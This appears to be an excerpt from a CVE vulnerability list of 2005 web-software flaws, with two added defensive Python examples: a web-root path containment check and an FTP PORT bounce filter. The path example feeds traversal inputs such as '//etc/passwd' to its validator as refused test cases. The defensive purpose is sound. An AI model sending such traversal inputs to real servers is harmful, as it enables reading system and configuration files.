[CVE-2005-1743] BEA WebLogic Server and WebLogic Express 8.1 through Service Pack 3 and 7.0 through Service Pack 5 does not properly handle when a security provider throws an exception, which may cause WebLogic to use incorrect identity for the thread, or to fail to audit security exceptions.
[CVE-2005-1742] BEA WebLogic Server and WebLogic Express 8.1 SP2 and SP3 allows users with the Monitor security role to "shrink or reset JDBC connection pools."
[CVE-2005-1735] Multiple cross-site scripting (XSS) vulnerabilities in PROMS before 0.11 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1733] Cookie Cart stores the password file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and encrypted passwords via a direct request to passwd.txt.
[CVE-2005-1716] TOPo 2.2 (2.2.178) stores data files in the data directory under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as client IP addresses.
[CVE-2005-1715] Cross-site scripting (XSS) vulnerability in index.php for TOPo 2.2 (2.2.178) allows remote attackers to inject arbitrary web script or HTML via the (1) m, (2) s, (3) ID, or (4) t parameters, or the (5) field name, (6) Your Web field, or (7) email field in the comments section.
[CVE-2005-1714] Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 3.0c2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1713] Multiple cross-site scripting (XSS) vulnerabilities in Serendipity 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) templatedropdown and (2) shoutbox plugins.
[CVE-2005-1710] Multiple cross-site scripting (XSS) vulnerabilities in Blue Coat Reporter before 7.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the username in an Add User window or (2) the license key (volatile.license_to_add parameter) in the Licensing page.
[CVE-2005-1707] The fn_show_postinst function in Gentoo webapp-config before 1.10-r14 allows local users to overwrite arbitrary files via a symlink attack on the postinst.txt temporary file.
[CVE-2005-1696] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites (aka NS-Multisites) module.
[CVE-2005-1695] Multiple cross-site scripting (XSS) vulnerabilities in the RSS module in PostNuke 0.750 and 0.760RC2 and RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) rss_url parameter to magpie_slashbox.php, or the url parameter to (2) magpie_simple.php or (3) magpie_debug.php.
[CVE-2005-1686] Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format string specifiers in the filename. NOTE: while this issue is triggered on the command line by the gedit user, it has been reported that web browsers and email clients could be configured to provide a file name as an argument to gedit, so there is a valid attack that crosses security boundaries.
[CVE-2005-1684] Cross-site scripting (XSS) vulnerability in default.asp for episodex guestbook allows remote attackers to inject arbitrary web script or HTML via the Name field and other fields.
[CVE-2005-1676] Multiple cross-site scripting (XSS) vulnerabilities in Groove Mobile Workspace in Groove Virtual Office before 3.1 build 2338, before 3.1a build 2364, and Groove Workspace before 2.5n build 1871 allow remote attackers to inject arbitrary web script or HTML via the (1) picture columns embedded within SharePoint lists or (2) drop-down menus in a SharePoint list.
[CVE-2005-1672] Multiple cross-site scripting (XSS) vulnerabilities in Help Center Live allow remote attackers to inject arbitrary web script or HTML via the (1) find parameter to index.php, (2) name or (3) message field of a chat request, or (4) the message body when opening a trouble ticket.
[CVE-2005-1669] Cross-site scripting (XSS) vulnerability in Opera 8.0 Final Build 1095 allows remote attackers to inject arbitrary web script or HTML via "javascript:" URLs when a new window or frame is opened, which allows remote attackers to bypass access restrictions and perform unauthorized actions on other domains.
[CVE-2005-1668] YusASP Web Asset Manager 1.0 allows remote attackers to gain privileges via a direct request to assetmanager.asp.
[CVE-2005-1663] Jeuce Personal Web Server 2.13 allows remote attackers to cause a denial of service (server crash) via a GET request beginning with "://".
[CVE-2005-1662] Directory traversal vulnerability in Jeuce Personal Web Server 2.13 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
[CVE-2005-1661] Jeuce Personal Webserver 2.13 allows remote attackers to cause a denial of service (server crash) via a long GET request, possibly triggering a buffer overflow.
[CVE-2005-1660] HTMLJunction EZGuestbook stores the guestbook.mdb file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the administrative password.
[CVE-2005-1658] Directory traversal vulnerability in filemanager.cpp in MyServer 0.8 allows remote attackers to list the parent directory of the web root via a URL with a "..." (triple dot).
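The traversal entries in this stretch of the list describe three variants of the same mistake: ".." segments (3Com Network Supervisor, Jeuce Personal Web Server), a "..." segment (MyServer above), and extra leading "/" or "\" characters (Perception LiteWeb). One containment routine handles all of them by decoding, normalising separators, stripping leading separators, refusing dot-only segments and then checking that the resolved path still lies under the document root. This is an added example, not code from any of those products or from the vulscan database; the document root and request paths are constructed.

```python
import posixpath
from urllib.parse import unquote


def resolve_under_root(web_root, url_path):
    """Map a request path onto the filesystem and refuse anything that would
    leave web_root. Works on POSIX-style paths; web_root must be absolute."""
    decoded = unquote(url_path)
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    # Treat backslash as a separator too: Windows servers (and some portable
    # ones) do, so "\..\" must not slip past a forward-slash-only check.
    decoded = decoded.replace("\\", "/")
    # Drop every leading separator, so "//etc/passwd" stays relative to the
    # root instead of being joined as an absolute path.
    relative = decoded.lstrip("/")
    # Refuse any segment made only of dots ("..", "...", ....) outright rather
    # than trusting normalisation to collapse it the same way the OS does.
    for segment in relative.split("/"):
        if len(segment) > 1 and set(segment) == {"."}:
            raise PermissionError("dot-only path segment: %r" % segment)
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # Final containment check, which also catches anything the filters missed.
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError("path escapes web root")
    return candidate


if __name__ == "__main__":
    for p in ("/index.html", "//etc/passwd", "/images/%2e%2e/config.php", "/.../"):
        try:
            print(p, "->", resolve_under_root("/var/www/html", p))
        except PermissionError as exc:
            print(p, "-> refused:", exc)
```

Note that unquote() decodes one layer only; a server that decodes twice (or a front end that decodes before forwarding) needs this check applied after the last decode. The last containment test is the one that matters on a real system, and on platforms with symlinks it should be made against the realpath of both sides.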
[CVE-2005-1653] Cross-site scripting (XSS) vulnerability in message.htm for Woppoware PostMaster 4.2.2 (build 3.2.5) allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2005-1650] The web mail service in Woppoware PostMaster 4.2.2 (build 3.2.5) generates different error messages depending on whether a user exists or not, which allows remote attackers to determine valid usernames.
[CVE-2005-1648] Gurgens (GASoft) Ultimate Forum 1.0 stores the db/Genid.dat database file under the web document root with insufficient access control, which allows remote attackers to obtain and decrypt usernames and passwords.
[CVE-2005-1647] Gurgens (GASoft) Guest Book 2.1 stores the db/Genid.dat database file under the web document root with insufficient access control, which allows remote attackers to obtain and decrypt usernames and passwords.
[CVE-2005-1646] The default installation of Fastream NETFile FTP/Web Server 7.4.6, which supports FXP, does not require that the IP address in a PORT command be the same as the IP of the logged in user, which allows remote attackers to conduct FTP Bounce attacks to bypass firewall rules or cause a denial of service.
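The NETFile entry above is the classic FTP bounce condition: the server opens the data connection to whatever address the PORT command names, so a client can direct it at a third host or a service port behind a firewall. The usual server-side rule, as an added example (not NETFile code and not from the vulscan database; the addresses are TEST-NET values constructed for the test), is to require the PORT address to equal the control connection's peer unless FXP is deliberately enabled, and to refuse privileged ports in any case.

```python
import ipaddress
import re

# RFC 959 PORT syntax: h1,h2,h3,h4,p1,p2 with the data port = p1*256 + p2.
PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$",
    re.IGNORECASE,
)


def parse_port_command(line):
    """Parse a PORT command into (IPv4Address, port) or raise ValueError."""
    match = PORT_RE.match(line)
    if not match:
        raise ValueError("malformed PORT command")
    values = [int(x) for x in match.groups()]
    if any(n > 255 for n in values):
        raise ValueError("byte value out of range")
    host = ipaddress.IPv4Address(".".join(str(n) for n in values[:4]))
    port = values[4] * 256 + values[5]
    return host, port


def check_port_command(line, control_peer, allow_fxp=False):
    """Decide whether to honour a PORT command from the client at control_peer.
    Unless FXP is explicitly enabled, the data address must equal the control
    connection's peer address; ports below 1024 are refused in either case so
    the server cannot be pointed at SMTP, HTTP or other services."""
    host, port = parse_port_command(line)
    if port < 1024:
        raise PermissionError("data port %d is a privileged port" % port)
    if not allow_fxp and host != ipaddress.IPv4Address(control_peer):
        raise PermissionError(
            "PORT address %s differs from control peer %s" % (host, control_peer)
        )
    return host, port


if __name__ == "__main__":
    # Constructed control-connection peer and PORT lines.
    for cmd in ("PORT 192,0,2,10,4,1", "PORT 192,0,2,99,4,1", "PORT 192,0,2,10,0,25"):
        try:
            print(cmd, "->", check_port_command(cmd, "192.0.2.10"))
        except (ValueError, PermissionError) as exc:
            print(cmd, "-> refused:", exc)
```

Enabling FXP (allow_fxp=True) is exactly the trade-off the advisory describes: site-to-site transfers require accepting a foreign address, so a server that offers FXP needs the privileged-port refusal plus an explicit per-user or per-network allow list rather than the bare default.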
[CVE-2005-1645] Keyvan1 ImageGallery stores the image.mdb database under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information.
[CVE-2005-1644] Cross-site scripting (XSS) vulnerability in guestbook.php for 1Two Livre d'Or 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) livreornom, (2) livreoremail, or (3) livreormessage parameters.
[CVE-2005-1639] SQL injection vulnerability in Sigmaweb.DLL in Sigma ISP Manager 6.6 allows remote attackers to execute arbitrary SQL commands via the (1) username, (2) password, or (3) domain fields.
[CVE-2005-1634] Multiple cross-site scripting (XSS) vulnerabilities in JGS-XA JGS-Portal 3.0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) anzahl_beitraege parameter to jgs_portal.php, (2) year parameter to jgs_portal_statistik.php, (3) year parameter to jgs_portal_beitraggraf.php, (4) tag parameter to jgs_portal_viewsgraf.php, (5) year parameter to jgs_portal_themengraf.php, (6) year parameter to jgs_portal_mitgraf.php, (7) id parameter to jgs_portal_sponsor.php, or (8) the Accept-Language header to jgs_portal_log.php. NOTE: this issue may stem from the same core problem as CVE-2005-1633.
[CVE-2005-1628] apage.cgi in WebAPP 0.9.9.2.1, and possibly earlier versions, allows remote attackers to execute arbitrary commands via shell metacharacters in the f parameter.
[CVE-2005-1622] Cross-site scripting (XSS) vulnerability in productsByCategory.asp in MetaCart e-Shop allows remote attackers to inject arbitrary web script or HTML via the strCatalog_NAME parameter.
[CVE-2005-1620] Cross-site scripting (XSS) vulnerability in Skull-Splitter Guestbook 1.0, 2.0 and 2.2 allows remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content of a message.
[CVE-2005-1619] Multiple cross-site scripting (XSS) vulnerabilities in (1) start_page.css.php3 (aka start-page.css.php3) or (2) style.css.php3 in PHPMyChat 0.14.5 allow remote attackers to inject arbitrary web script or HTML commands via the FontName parameter. NOTE: it was later reported that 0.14.5 is also affected.
[CVE-2005-1617] Willings WebCam and WebCam Lite 2.8 and earlier stores the password in memory in plaintext, which allows local users to gain sensitive information.
[CVE-2005-1614] Cross-site scripting (XSS) vulnerability in viewforum.php in Ultimate PHP Board (UPB) 1.8 through 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the postorder parameter.
[CVE-2005-1613] Cross-site scripting (XSS) vulnerability in member.php in Open Bulletin Board (OpenBB) 1.0.8 allows remote attackers to inject arbitrary web script or HTML via the reverse parameter in a list action.
[CVE-2005-1611] Cross-site scripting (XSS) vulnerability in WebX in Web Crossing 5.x allows remote attackers to inject arbitrary web script or HTML via a URL with an "@" followed by the desired script.
[CVE-2005-1610] Cross-site scripting (XSS) vulnerability in security.php for Tru-Zone NukeET 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via a base64 encoded Codigo parameter.
[CVE-2005-1607] Cross-site scripting (XSS) vulnerability in shop.cgi in Remote Cart allows remote attackers to inject arbitrary web script or HTML via the (1) merchant or (2) demo parameters.
[CVE-2005-1605] Cross-site scripting (XSS) vulnerability in the guestbook for SiteStudio 1.6 allows remote attackers to inject arbitrary web script or HTML via the name field to (1) psoft.guestbook.GuestBookServ in Standalone Site Studio or (2) E-Guest_sign.pl in Integrated Site Studio with H-Sphere.
[CVE-2005-1601] MRO Maximo Self Service 4 and 5 stores certain information under the web document root using file extensions that are not processed by Tomcat, which allows remote attackers to obtain sensitive information via a direct request for the file, such as MXServer.properties.
[CVE-2005-1599] Cross-site scripting (XSS) vulnerability in Kryloff Technologies Subject Search Server (SSServer) 1.1 allows remote attackers to inject arbitrary web script or HTML via the "Search For" field.
[CVE-2005-1597] Cross-site scripting (XSS) vulnerability in (1) search.php and (2) topics.php for Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the highlite parameter.
[CVE-2005-1595] CodeThat ShoppingCart 1.3.1 stores config.ini under the web root, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2005-1593] Cross-site scripting (XSS) vulnerability in catalog.php for CodeThat ShoppingCart 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-1590] The Altiris Client Service for Windows (ACLIENT.EXE) 6.0.88 allows local users to disable password protection and access the administrative interface by finding and showing the "Altiris Client Service" hidden window, disabling the password protection, disabling the "Hide client tray icon box" option, then opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2004-2070.
[CVE-2005-1587] Cross-site scripting (XSS) vulnerability in index.php for Quick.cart 0.3.0 allows remote attackers to inject arbitrary web script or HTML via the sWord parameter.
[CVE-2005-1586] Quick.Forum 2.1.6 stores potentially sensitive information such as usernames, banned IP addresses, censored words, and backups under the web document root, which allows remote attackers to obtain that information via a direct request to (1) db/users.txt, (2) db/banList.txt, (3) db/censureWords.txt, or (4) backup files.
[CVE-2005-1584] Cross-site scripting (XSS) vulnerability in index.php for Quick.Forum 2.1.6 allows remote attackers to inject arbitrary web script or HTML via the topic field in a NewTopic action.
[CVE-2005-1582] Cross-site scripting (XSS) vulnerability in index.php for 1Two News 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) nom, (2) email, (3) siteweb, or (4) commentaire variables.
[CVE-2005-1581] Cross-site scripting (XSS) vulnerability in Bug Report 1.0 allows remote attackers to inject arbitrary web script or HTML via various fields to bug_report.php, which are not filtered or quoted when processed by bug_list.php or admin/index.php.
[CVE-2005-1574] Windows Media Player 9 and 10, in certain cases, allows content protected by Windows Media Digital Rights Management (WMDRM) to redirect the user to a web site to obtain a license, even when the "Acquire licenses automatically for protected content" setting is not enabled.
[CVE-2005-1569] Cross-site scripting (XSS) vulnerability in DirectTopics 2.1 and 2.2 allows remote attackers to inject arbitrary web script via a javascript: URL in (1) a thread or (2) an IMG tag.
[CVE-2005-1565] Bugzilla 2.17.1 through 2.18, 2.19.1, and 2.19.2, when a user is prompted to log in while attempting to view a chart, displays the password in the URL, which may allow local users to gain sensitive information from web logs or browser history.
[CVE-2005-1562] Multiple SQL injection vulnerabilities in MaxWebPortal 1.3.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) fpassword parameter to inc_functions.asp, (2) txtAddress, (3) message, or (4) subject parameter to post_info.asp, (5) andor parameter to search.asp, (6) verkey parameter to pop_profile.asp, or (7) Remove or (8) Delete parameter to pm_delete2.asp.
[CVE-2005-1561] Multiple cross-site scripting (XSS) vulnerabilities in post.asp in MaxWebPortal 1.3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mod, (2) M, or (3) type parameter.
[CVE-2005-1559] The web module in Neteyes Nexusway allows remote attackers to execute arbitrary commands via hex-encoded shell metacharacters in the ip parameter for (1) nslookup.cgi or (2) ping.cgi.
[CVE-2005-1558] The web module in Neteyes Nexusway allows remote attackers to bypass authentication and gain administrator privileges by setting the cyclone500_auth cookie.
[CVE-2005-1557] Multiple cross-site scripting (XSS) vulnerabilities in WebApp Guestbook PRO 3.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content of a message.
[CVE-2005-1555] Cross-site scripting (XSS) vulnerability in the JRun Web Server in ColdFusion MX 7.0 allows remote attackers to inject arbitrary script or HTML via the URL, which is not properly quoted in the resulting default 404 error page.
[CVE-2005-1508] Multiple cross-site scripting (XSS) vulnerabilities in PwsPHP 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) month or (2) annee parameters to the news module, (3) nbractif or (4) annee parameters to the stats module, (5) id parameter to profil.php, (6) mb_lettre or (7) lettre parameter to memberlist.php, or (8) chaine_search, or (9) auteur_search parameter to the recherche module.
[CVE-2005-1507] Buffer overflow in the Tomcat plugin in 4d WebSTAR 5.33 and 5.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL.
[CVE-2005-1502] Cross-site scripting (XSS) vulnerability in MidiCart PHP Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the (1) searchstring parameter to search_list.php or the (2) secondgroup or (3) maingroup parameters to item_list.php.
[CVE-2005-1498] Multiple cross-site scripting (XSS) vulnerabilities in myBloggie 2.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) year parameter in viewmode.php, or the (2) cat_id, (3) month_no, or (4) post_id parameter in index.php, which are not properly sanitized before they are displayed in an error message. NOTE: issues 2, 3, and 4 may be due to a problem in associated products rather than myBloggie itself.
[CVE-2005-1494] Multiple cross-site scripting (XSS) vulnerabilities in admin.cgi in MegaBook 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) entryid or (2) password parameter.
[CVE-2005-1492] Cross-site scripting (XSS) vulnerability in user.cgi in Gossamer Threads Links SQL 2.x and 3.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2005-1491] Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allows remote authenticated users to (1) move their home directory via viewaction.html or (2) move arbitrary files via the importfile parameter to importaction.html.
[CVE-2005-1490] Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2, when the mailbox.dat file does not exist, allows remote authenticated users to determine if a file exists via the folder parameter to attachment.html.
[CVE-2005-1489] Unknown vulnerability in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allows remote authenticated users to obtain the full path of the server via certain requests to (1) calendar_addevent.html, (2) calendar_event.html, or (3) calendar_task.html.
[CVE-2005-1488] Multiple cross-site scripting (XSS) vulnerabilities in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allow remote authenticated users to inject arbitrary web script or HTML via (1) the E-mail address, Note, or Public Certificate fields to address.html, (2) addressaction.html, (3) the Signature field to settings.html, or (4) the Shared calendars to calendarsettings.html.
[CVE-2005-1486] Multiple cross-site scripting vulnerabilities in FishCart 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) trackingnum, (2) reqagree, or (3) m parameter to upstracking.php or (4) nlst parameter to display.php. NOTE: the vendor was not able to reproduce some of the reported vectors but believes that they have been addressed. The original researcher is known to be unreliable.
[CVE-2005-1483] Multiple cross-site scripting (XSS) vulnerabilities in ArticleLive 2005 allow remote attackers to inject arbitrary web script or HTML via the (1) Query, (2) Username, (3) LastName, (4) Biography, or (5) BlogId parameter.
[CVE-2005-1477] The install function in Firefox 1.0.3 allows remote web sites on the browser's whitelist, such as update.mozilla.org or addon.mozilla.org, to execute arbitrary Javascript with chrome privileges, leading to arbitrary code execution on the system when combined with vulnerabilities such as CVE-2005-1476, as demonstrated using a javascript: URL as the package icon and a cross-site scripting (XSS) attack on a vulnerable whitelist site.
[CVE-2005-1471] Heap-based buffer overflow in RSA SecurID Web Agent 5, 5.2, and 5.3 allows remote attackers to execute arbitrary code via crafted chunked-encoding data.
[CVE-2005-1448] Cross-site scripting (XSS) vulnerability in the BBCode plugin for Serendipity before 0.8 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1444] Multiple cross-site scripting (XSS) vulnerabilities in SitePanel 2.6.1 and earlier (SitePanel2) allow remote attackers to inject arbitrary web script or HTML via (1) the v, show, or sec_name parameters to main.php, (2) the inadmin, newsev, or postid parameters to 5.php, or (3) the id parameter to 0.php.
[CVE-2005-1443] Multiple cross-site scripting (XSS) vulnerabilities in index.php for Invision Power Board (IPB) 2.0.3 and 2.1 Alpha 2 allow remote attackers to inject arbitrary web script or HTML via the (1) act, (2) Members, (3) calendar, or (4) HID parameters.
[CVE-2005-1440] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Shop Enterprise 2.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) various parameters to basket.php, (2) the nickname, email, topic, and message fields in forum.php, as demonstrated using forum_new_thread.php and forum_thread.php, (3) the page parameter to page.php, (4) category_id and item_id parameters to reviews.php, (5) the category_id parameter to product_details.php, (6) the category_id or search_string parameters to products.php, or (7) the rp or page parameters to news_view.php.
[CVE-2005-1436] Multiple cross-site scripting (XSS) vulnerabilities in osTicket allow remote attackers to inject arbitrary web script or HTML via (1) the t parameter to view.php, (2) the osticket_title parameter to header.php, (3) the em parameter to admin_login.php, (4) the e parameter to user_login.php, (5) the err parameter to open_submit.php, or (6) the name and subject fields when adding a ticket.
[CVE-2005-1435] Open WebMail (OWM) before 2.51 20050430 allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename.
[CVE-2005-1427] Uapplication Uphotogallery stores the database under the web document root, which allows remote attackers to obtain sensitive information via a direct request to uphotogallery.mdb.
[CVE-2005-1426] Uapplication Ublog Reload stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mdb-database/blog.mdb (aka mdb-database/blog.msb).
[CVE-2005-1425] Uapplication Uguestbook 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mdb-database/guestbook.mdb.
[CVE-2005-1417] Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp.
[CVE-2005-1416] Directory traversal vulnerability in 04WebServer 1.81 allows remote attackers to read files outside of the web root but within the installation folder.
[CVE-2005-1405] HTTP response splitting vulnerability in the @SetHTTPHeader function in Lotus Domino 6.5.x before 6.5.4 and 6.0.x before 6.0.5 allows attackers to poison the web cache via malicious applications.
[CVE-2005-1403] Multiple cross-site scripting (XSS) vulnerabilities in JustWilliam's Amazon Webstore 04050100 allow remote attackers to inject arbitrary web script or HTML via the (1) image parameter to closeup.php, the (2) currentIsExpanded or (3) searchFor parameters to index.php, (4) the currentNumber parameter to software_CAD_Technical_60002_uk.htm, or (5) a cookie.
[CVE-2005-1388] Cross-site scripting (XSS) vulnerability in SURVIVOR before 0.9.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1386] PHP-Nuke 7.6 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) ipban.php, (2) db.php, (3) lang-norwegian.php, (4) lang-indonesian.php, (5) lang-greek.php, (6) a request to Web_Links with the portuguese language (lang-portuguese.php), (7) a request to Web_Links with the indonesian language (lang-indonesian.php), (8) a request to the survey module with the indonesian language (lang-indonesian.php), (9) a request to the Reviews module with the portuguese language, or (10) a request to the Journal module with the portuguese language, which reveal the path in an error message.
[CVE-2005-1383] The OHS component 1.0.2 through 10.x, when UseWebcacheIP is disabled, in Oracle Application Server allows remote attackers to bypass HTTP Server mod_access restrictions via a request to the webcache TCP port 7778.
[CVE-2005-1382] The webcacheadmin module in Oracle Webcache 9i allows remote attackers to corrupt arbitrary files via a full pathname in the cache_dump_file parameter.
[CVE-2005-1381] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Webcache 9i allow remote attackers to inject arbitrary web script or HTML via the (1) cache_dump_file or (2) PartialPageErrorPage parameter.
[CVE-2005-1380] Cross-site scripting (XSS) vulnerability in BEA Admin Console 8.1 allows remote attackers to execute arbitrary web script or HTML via the server parameter to a JndiFramesetAction action.
[CVE-2005-1374] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.5.3 through 1.6 Release Candidate 1, and possibly Dokeos, allow remote attackers to inject arbitrary web script or HTML via (1) exercise_result.php, (2) exercice_submit.php, (3) agenda.php, (4) learningPathList.php, (5) learningPathAdmin.php, (6) learningPath.php, (7) userLog.php, (8) tool parameter to toolaccess_details.php, (9) data parameter to user_access_details.php, or (10) coursePath parameter to myagenda.php.
[CVE-2005-1367] Pico Server (pServ) 3.2 and earlier allows local users to read arbitrary files as the pServ user via a symlink to a file outside of the web document root.
[CVE-2005-1360] PHP remote file inclusion vulnerability in error.php in GrayCMS 1.1 allows remote attackers to execute arbitrary PHP code by modifying the path_prefix parameter to reference a URL on a remote web server that contains the code.
[CVE-2005-1359] Cross-site scripting (XSS) vulnerability in the text.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument.
[CVE-2005-1356] Cross-site scripting (XSS) vulnerability in the includer.cgi script in The Includer allows remote attackers to inject arbitrary web script or HTML via the argument.
[CVE-2005-1352] Cross-site scripting (XSS) vulnerability in the ad.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument.
[CVE-2005-1346] Multiple Symantec AntiVirus products, including Norton AntiVirus 2005 11.0.0, Web Security 3.0.1.72, Mail Security for SMTP 4.0.5.66, AntiVirus Scan Engine 4.3.7.27, SAV/Filter for Domino NT 3.1.1.87, and Mail Security for Exchange 4.5.4.743, when running on Windows, allow remote attackers to cause a denial of service (component crash) and avoid detection via a crafted RAR file.
[CVE-2005-1327] Cross-site scripting (XSS) vulnerability in pms.php for Woltlab Burning Board 2.3.1 PL2 and earlier allows remote attackers to inject arbitrary web script or HTML via the folderid parameter.
[CVE-2005-1324] Multiple cross-site scripting (XSS) vulnerabilities in index.php for phpMyVisites allow remote attackers to inject arbitrary web script or HTML via the (1) part, (2) per, or (3) site parameters.
[CVE-2005-1322] Cross-site scripting (XSS) vulnerability in Horde Nag Task List Manager before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1321] Cross-site scripting (XSS) vulnerability in Horde Vacation module before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1320] Cross-site scripting (XSS) vulnerability in Horde Mnemo Note Manager before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1319] Cross-site scripting (XSS) vulnerability in Horde IMP Webmail client before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1318] Cross-site scripting (XSS) vulnerability in Horde Forwards E-Mail Forwarding Manager before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1317] Cross-site scripting (XSS) vulnerability in Horde Chora module before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1316] Cross-site scripting (XSS) vulnerability in Horde Accounts module before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1315] Cross-site scripting (XSS) vulnerability in Horde Turba module before 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1314] Cross-site scripting (XSS) vulnerability in Horde Kronolith module before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1313] Cross-site scripting (XSS) vulnerability in Horde Passwd module before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title.
[CVE-2005-1311] Cross-site scripting (XSS) vulnerability in Yappa-NG before 2.3.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1309] Cross-site scripting (XSS) vulnerability in bBlog 0.7.4 allows remote attackers to inject arbitrary web script or HTML via the (1) entry title field or (2) comment body text.
[CVE-2005-1308] SqWebMail allows remote attackers to inject arbitrary web script or HTML via CRLF sequences in the redirect parameter followed by the desired script or HTML.
[CVE-2005-1301] nProtect:Netizen 2005.3.17.1 does not properly verify that the update module is downloaded from an authorized site, which allows remote malicious web sites to write arbitrary files.
[CVE-2005-1300] Cross-site scripting (XSS) vulnerability in the inserter.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument.
[CVE-2005-1297] Cross-site scripting (XSS) vulnerability in the include.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument.
[CVE-2005-1292] Multiple cross-site scripting (XSS) vulnerabilities in CartWIZ ASP Cart allow remote attackers to inject arbitrary web script or HTML via the idProduct parameter to (1) tellAFriend.asp or (2) addToWishlist.asp, redirect parameter to (3) access.asp or (4) login.asp, message parameter to (5) login.asp or (6) error.asp, or (7) sku or (8) name parameter to searchResults.asp.
[CVE-2005-1290] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) u parameter to profile.php, (2) highlight parameter to viewtopic.php, or (3) forumname or forumdesc parameters to admin_forums.php.
[CVE-2005-1285] Cross-site scripting (XSS) vulnerability in thread.php in WoltLab Burning Board 2.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the hilight parameter.
[CVE-2005-1274] Stack-based buffer overflow in the getIfHeader function in the WebDAV functionality in MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via an HTTP unlock request and a long "If" parameter.
[CVE-2005-1252] Directory traversal vulnerability in the Web Calendaring server in Ipswitch Imail 8.13, and other versions before IMail Server 8.2 Hotfix 2, allows remote attackers to read arbitrary files via "..\" (dot dot backslash) sequences in the query string argument in a GET request to a non-existent .jsp file.
